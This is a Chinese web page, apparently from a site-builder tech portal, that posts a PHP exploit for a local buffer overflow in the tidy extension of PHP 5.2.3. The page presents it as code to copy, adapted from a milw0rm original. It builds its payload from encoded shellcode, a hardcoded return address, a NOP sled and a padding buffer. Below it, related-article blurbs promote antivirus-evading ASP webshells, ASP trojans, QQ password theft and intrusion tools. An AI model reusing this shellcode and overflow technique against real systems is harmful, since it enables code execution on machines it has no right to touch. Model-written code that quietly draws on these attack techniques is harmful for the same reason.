首页 网页制作网络编程脚本专栏数据库网站运营网络安全平面设计CMS教程

PHP 5.2.3 tidy扩展本地溢出漏洞利用代码

所属分类: 实用技巧 / 安全教程 阅读数: 827
收藏 0 赞 0 分享
复制代码 代码如下:

<?php 

if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");} 

$scode = 
"\xfc\xbb\xc7\xc4\x05\xc9\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85". 
"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x3b\x2c\x41\xc9\xc3\xad\xc1". 
"\x8c\xff\x26\xa9\x0b\x87\x39\xbd\x9f\x38\x22\xca\xff\xe6\x53\x27". 
"\xb6\x6d\x67\x3c\x48\x9f\xb9\x82\xd2\xf3\x3e\xc2\x91\x0c\xfe\x09". 
"\x54\x13\xc2\x65\x93\x28\x96\x5d\x58\x3b\xf3\x15\x3f\xe7\xfa\xc2". 
"\xa6\x6c\xf0\x5f\xac\x2d\x15\x61\x59\x5a\x39\xea\x9c\xb7\xcb\xb0". 
"\xba\x43\x0f\x79\x03\x2f\x04\x3a\xb3\x2a\xda\xc3\xbf\xbf\x9b\x3f". 
"\x4b\xcf\x07\xed\xc0\x47\x30\x06\xdf\x1c\xc0\x68\xe0\x22\xc1\x03". 
"\x89\x1e\x9e\x22\xbc\x3e\x76\xcc\xb8\x3d\xb6\xb5\x68\x29\xc7\xc0". 
"\x8d\xf6\x4f\x4d\x73\x82\x9e\x3a\x73\x75\xfd\xa9\xef\x57\x67\x4a". 
"\x95\x87\x48\xc9\x75\xa9\xf3\x79\x56\x40\x8f\xe4\xe4\x8a\x1d\x86". 
"\x71\xa2\xd5\x2b\xa2\x40\x77\xd5\xca\x90\x14\x05\x24\x99\x9e\x01". 
"\x1a\x3f\x39\xaa\x34\x5a\x31\x8a\xa4\xcb\xda\xab\x58\x74\x6f\x43". 
"\xd4\x0a\xaf\xda\x72\x87\xc6\xb2\x13\x24\x6d\x39\x85\xbe\xe2\xcf". 
"\x36\x1e\x8f\x4e\xc0\x36\x5b\xf2\x12\xe9\xe2\xb0\x16\xf5\xe4\x38". 
"\x97\xf5\xe4\x38\x97"; 


$EIP="\xD8\x69\x83\x7C";  
$NOP=str_repeat("\x90",12); 
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode; 
tidy_parse_string(1,$____buff,1); 
?> 


看了MILW0RM上的EXP稍微改了下,中
更多精彩内容其他人还在看

一些通用跳转地址,XXOXX的时候有点用

近日在写exploit的时候需要用到一些其他语言的call ebx的跳转地址,但是metasploit的opcode DB没有包括繁体中文、日文、韩文机器的跳转地址,所以费了点时间收集了下,在这里要感谢傲少提供的机器给我去找地址。现在贴到这里,方便大家。
收藏 0 赞 0 分享

入侵过程中用过的三大门派的几个小工具[推荐]

vbs在入侵中的作用、我在入侵中的注意的细节、跨站、入侵中的批处理、入侵过程中用的小工具共有这五个,当然随着期数的变化,出的题目也会增加,现在大家针对这些题目欢迎来稿呀,不要被高手这两个字吓住了。
收藏 0 赞 0 分享

sql2005 sa执行命令方法总结

测试环境:windows xp pro sp2 + mssql 2005(服务以system权限启动)
收藏 0 赞 0 分享

几款双功能免杀超强版asp小马

几款双功能免杀超强版asp小马,对于需要查找后门的朋友可以参考下。
收藏 0 赞 0 分享

如何防范别人盗你的qq号(盗别人的qq密码)

想用别人的 qq号码,最主要的就是把别人的密码偷来,那么怎么盗别人的qq密码呢?不过,没有人会告诉你:我的密码是什么什么,请你尽情的用我的号码吧!那么,黑客是怎么去把别人的密码偷来呢
收藏 0 赞 0 分享

QQ聊天记录删除了怎么恢复 详细步骤教程

许多网友都想知道“QQ聊天记录删除了怎么恢复”,因为QQ聊天记录对于我们来说是很重要的数据。下面我们就来介绍下如何解决QQ聊天记录删除恢复的问题
收藏 0 赞 0 分享

php+mysql注入页面实现

最近在弄靶场,原本是打算找一些漏洞程序来做实验环境,但是去找这些程序感觉太麻烦了,几段代码能实现的东西还是自己写吧
收藏 0 赞 0 分享

QQ密码被盗怎么办 (教你如何找回QQ密码)

QQ密码保护是一套保障QQ密码安全的机制。通过给你的QQ号填写对应的相关资料,如证件号、安全提示问题、安全邮箱等,给你的QQ号穿一件防弹衣。一旦出现问题,就可以通过QQ密码保护找回QQ密码
收藏 0 赞 0 分享

QQ密码找回方法全攻略(QQ被盗怎么要回QQ密码呢)

自从本站开办以来,不断有网友来信大量重复询问同一个问题:QQ密码的破解。因为站长有限的精力,不可能一一作答,以后同样的问题我将不会回覆了,您自己看这篇教程吧
收藏 0 赞 0 分享

让你变成ASP木马高手

这篇文章主要介绍了让你变成ASP木马高手
收藏 0 赞 0 分享
查看更多

网络赚钱

更多

站长故事

更多
建站极客
合作伙伴
在线工具
建站极客移动版
聚合全网技术文章,根据你的阅读喜好进行个性推荐
© 2012 - 2020 zhanzhang360.cn Some Rights Reserved.
沪ICP备13040166号-22